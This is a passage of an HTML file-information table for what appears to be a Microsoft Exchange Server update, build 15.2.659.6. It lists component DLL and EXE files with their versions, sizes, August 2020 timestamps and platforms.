</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.syncprovider.dll</td><td>15.2.659.6</td><td>43,400</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xml.dll</td><td>15.2.659.6</td><td>447,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xrmprovider.dll</td><td>15.2.659.6</td><td>89,992</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.monitoring.dll</td><td>15.2.659.6</td><td>107,904</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriveragents.dll</td><td>15.2.659.6</td><td>374,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedrivercommon.dll</td><td>15.2.659.6</td><td>193,920</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.dll</td><td>15.2.659.6</td><td>552,328</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll</td><td>15.2.659.6</td><td>16,256</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.eventlog.dll</td><td>15.2.659.6</td><td>15,736</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.dll</td><td>15.2.659.6</td><td>321,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.syncdelivery.dll</td><td>15.2.659.6</td><td>45,440</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.managedlexruntime.mppgruntime.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.activedirectory.dll</td><td>15.2.659.6</td><td>415,104</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.classificationdefinitions.dll</td><td>15.2.659.6</td><td>1,269,632</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.compliancepolicy.dll</td><td>15.2.659.6</td><td>39,296</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.basics.dll</td><td>15.2.659.6</td><td>433,024</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>15.2.659.6</td><td>4,563,336</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.owaoptionstrings.dll</td><td>15.2.659.6</td><td>260,992</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>15.2.659.6</td><td>33,672</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.deployment.analysis.dll</td><td>15.2.659.6</td><td>94,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.dll</td><td>15.2.659.6</td><td>586,120</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.xml.dll</td><td>15.2.659.6</td><td>3,542,400</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>15.2.659.6</td><td>16,487,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>15.2.659.6</td><td>58,752</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.infrastructure.asynchronoustask.dll</td><td>15.2.659.6</td><td>23,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.jitprovisioning.dll</td><td>15.2.659.6</td><td>101,760</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.migration.dll</td><td>15.2.659.6</td><td>543,624</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.mobility.dll</td><td>15.2.659.6</td><td>305,032</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>15.2.659.6</td><td>273,792</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>15.2.659.6</td><td>418,688</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.provisioning.dll</td><td>15.2.659.6</td><td>275,832</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.psdirectinvoke.dll</td><td>15.2.659.6</td><td>70,520</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.rbacdefinition.dll</td><td>15.2.659.6</td><td>7,873,408</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.recipient.dll</td><td>15.2.659.6</td><td>1,502,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>15.2.659.6</td><td>71,552</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>15.2.659.6</td><td>1,238,912</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.transport.dll</td><td>15.2.659.6</td><td>1,876,872</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>15.2.659.6</td><td>5,366,656</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.mapihttpclient.dll</td><td>15.2.659.6</td><td>117,640</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mapihttphandler.dll</td><td>15.2.659.6</td><td>207,744</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>15.2.659.6</td><td>79,744</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.dlppolicyagent.dll</td><td>15.2.659.6</td><td>156,032</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>15.2.659.6</td><td>65,912</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>15.2.659.6</td><td>30,600</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.filtering.dll</td><td>15.2.659.6</td><td>58,240</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.hygienerules.dll</td><td>15.2.659.6</td><td>29,568</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>15.2.659.6</td><td>175,488</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>15.2.659.6</td><td>28,544</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.retentionpolicyagent.dll</td><td>15.2.659.6</td><td>75,136</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>15.2.659.6</td><td>207,232</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>15.2.659.6</td><td>440,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.supervisoryreviewagent.dll</td><td>15.2.659.6</td><td>83,328</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>15.2.659.6</td><td>35,200</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unifiedpolicycommon.dll</td><td>15.2.659.6</td><td>53,120</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unjournalagent.dll</td><td>15.2.659.6</td><td>96,640</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.migration.dll</td><td>15.2.659.6</td><td>1,109,888</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.migrationworkflowservice.eventlog.dll</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>15.2.659.6</td><td>135,552</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.activemonitoring.local.components.dll</td><td>15.2.659.6</td><td>5,066,632</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.servicecontextprovider.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.mrsmlbconfiguration.dll</td><td>15.2.659.6</td><td>68,480</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>15.2.659.6</td><td>5,086,072</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.rightsmanagement.dll</td><td>15.2.659.6</td><td>265,600</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.networksettings.dll</td><td>15.2.659.6</td><td>37,768</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.notifications.broker.eventlog.dll</td><td>15.2.659.6</td><td>14,208</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.notifications.broker.exe</td><td>15.2.659.6</td><td>549,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>15.2.659.6</td><td>22,912</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabrequesthandler.dll</td><td>15.2.659.6</td><td>106,368</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.oauth.core.dll</td><td>15.2.659.6</td><td>291,720</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.objectstoreclient.dll</td><td>15.2.659.6</td><td>17,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.configuration.dll</td><td>15.2.659.6</td><td>277,896</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.dll</td><td>15.2.659.6</td><td>2,993,544</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.common.dll</td><td>15.2.659.6</td><td>90,504</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grain.dll</td><td>15.2.659.6</td><td>101,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graincow.dll</td><td>15.2.659.6</td><td>38,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graineventbasedassistants.dll</td><td>15.2.659.6</td><td>45,440</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grainpropagationengine.dll</td><td>15.2.659.6</td><td>58,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransactionstorage.dll</td><td>15.2.659.6</td><td>147,336</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransportdeliveryagent.dll</td><td>15.2.659.6</td><td>26,496</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graphstore.dll</td><td>15.2.659.6</td><td>184,192</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.permailboxkeys.dll</td><td>15.2.659.6</td><td>26,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondarycopyquotamanagement.dll</td><td>15.2.659.6</td><td>38,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondaryshallowcopylocation.dll</td><td>15.2.659.6</td><td>55,680</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.security.dll</td><td>15.2.659.6</td><td>147,336</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.semanticgraph.dll</td><td>15.2.659.6</td><td>191,872</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.tasklogger.dll</td><td>15.2.659.6</td><td>33,672</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.partitioncache.dll</td><td>15.2.659.6</td><td>28,032</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.passivemonitoringsettings.dll</td><td>15.2.659.6</td><td>32,648</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.photogarbagecollectionservicelet.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll.fe</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>15.2.659.6</td><td>106,888</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.exe.fe</td><td>15.2.659.6</td><td>106,888</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe.fe</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popconfiguration.dl1</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>15.2.659.6</td><td>264,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll.fe</td><td>15.2.659.6</td><td>264,576</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.powersharp.dll</td><td>15.2.659.6</td><td>358,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.powersharp.management.dll</td><td>15.2.659.6</td><td>4,166,016</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>15.2.659.6</td><td>308,608</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>15.2.659.6</td><td>41,344</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.fasttransfer.dll</td><td>15.2.659.6</td><td>137,088</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.mapi.dll</td><td>15.2.659.6</td><td>441,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioning.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>15.2.659.6</td><td>224,648</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningservicelet.dll</td><td>15.2.659.6</td><td>105,864</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>15.2.659.6</td><td>168,832</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll.deploy</td><td>15.2.659.6</td><td>168,832</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pswsclient.dll</td><td>15.2.659.6</td><td>259,464</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.publicfolders.dll</td><td>15.2.659.6</td><td>72,072</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.crimsonevents.dll</td><td>15.2.659.6</td><td>215,944</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.pushnotifications.dll</td><td>15.2.659.6</td><td>106,872</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.publishers.dll</td><td>15.2.659.6</td><td>425,856</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.server.dll</td><td>15.2.659.6</td><td>70,528</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.analysis.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.configuration.dll</td><td>15.2.659.6</td><td>215,944</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.core.dll</td><td>15.2.659.6</td><td>168,320</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.ranking.dll</td><td>15.2.659.6</td><td>343,424</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.retrieval.dll</td><td>15.2.659.6</td><td>174,464</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.suggestions.dll</td><td>15.2.659.6</td><td>95,112</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.realtimeanalyticspublisherservicelet.dll</td><td>15.2.659.6</td><td>127,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.core.dll</td><td>15.2.659.6</td><td>63,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.data.dll</td><td>15.2.659.6</td><td>36,744</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.mailtagger.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.people.dll</td><td>15.2.659.6</td><td>9,666,952</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.peopleindex.dll</td><td>15.2.659.6</td><td>20,788,096</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.659.6</td><td>36,736</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.perm.dll</td><td>15.2.659.6</td><td>97,664</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.sassuggest.dll</td><td>15.2.659.6</td><td>28,544</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.upm.dll</td><td>15.2.659.6</td><td>72,072</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.client.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.routing.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.server.exe</td><td>15.2.659.6</td><td>59,272</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>15.2.659.6</td><td>1,646,984</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>15.2.659.6</td><td>207,232</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>15.2.659.6</td><td>60,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>15.2.659.6</td><td>518,024</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.monitoring.dll</td><td>15.2.659.6</td><td>161,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>15.2.659.6</td><td>724,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>15.2.659.6</td><td>234,872</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>15.2.659.6</td><td>35,208</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpchttpmodules.dll</td><td>15.2.659.6</td><td>42,376</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>15.2.659.6</td><td>56,192</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>15.2.659.6</td><td>27,520</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.rules.common.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>15.2.659.6</td><td>14,720</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.safehtml.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.activities.dll</td><td>15.2.659.6</td><td>267,648</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.contacts.dll</td><td>15.2.659.6</td><td>110,984</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.core.dll</td><td>15.2.659.6</td><td>112,512</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sandbox.services.dll</td><td>15.2.659.6</td><td>622,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.dll</td><td>15.2.659.6</td><td>185,216</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.bigfunnel.eventlog.dll</td><td>15.2.659.6</td><td>12,168</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.blingwrapper.dll</td><td>15.2.659.6</td><td>19,336</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.core.dll</td><td>15.2.659.6</td><td>211,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.ediscoveryquery.dll</td><td>15.2.659.6</td><td>17,800</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.engine.dll</td><td>15.2.659.6</td><td>97,664</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.configuration.dll</td><td>15.2.659.6</td><td>16,776</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.fast.dll</td><td>15.2.659.6</td><td>436,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.files.dll</td><td>15.2.659.6</td><td>274,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.flighting.dll</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.mdb.dll</td><td>15.2.659.6</td><td>217,984</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.service.exe</td><td>15.2.659.6</td><td>26,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.applicationencryption.dll</td><td>15.2.659.6</td><td>221,048</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>15.2.659.6</td><td>1,558,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.msarpsservice.exe</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.security.securitymsg.dll</td><td>15.2.659.6</td><td>28,552</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.admininterface.dll</td><td>15.2.659.6</td><td>225,160</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.common.dll</td><td>15.2.659.6</td><td>5,151,104</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.diagnostics.dll</td><td>15.2.659.6</td><td>214,912</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.directoryservices.dll</td><td>15.2.659.6</td><td>115,576</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.esebackinterop.dll</td><td>15.2.659.6</td><td>82,824</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.eventlog.dll</td><td>15.2.659.6</td><td>80,768</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.server.storage.fulltextindex.dll</td><td>15.2.659.6</td><td>66,440</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr>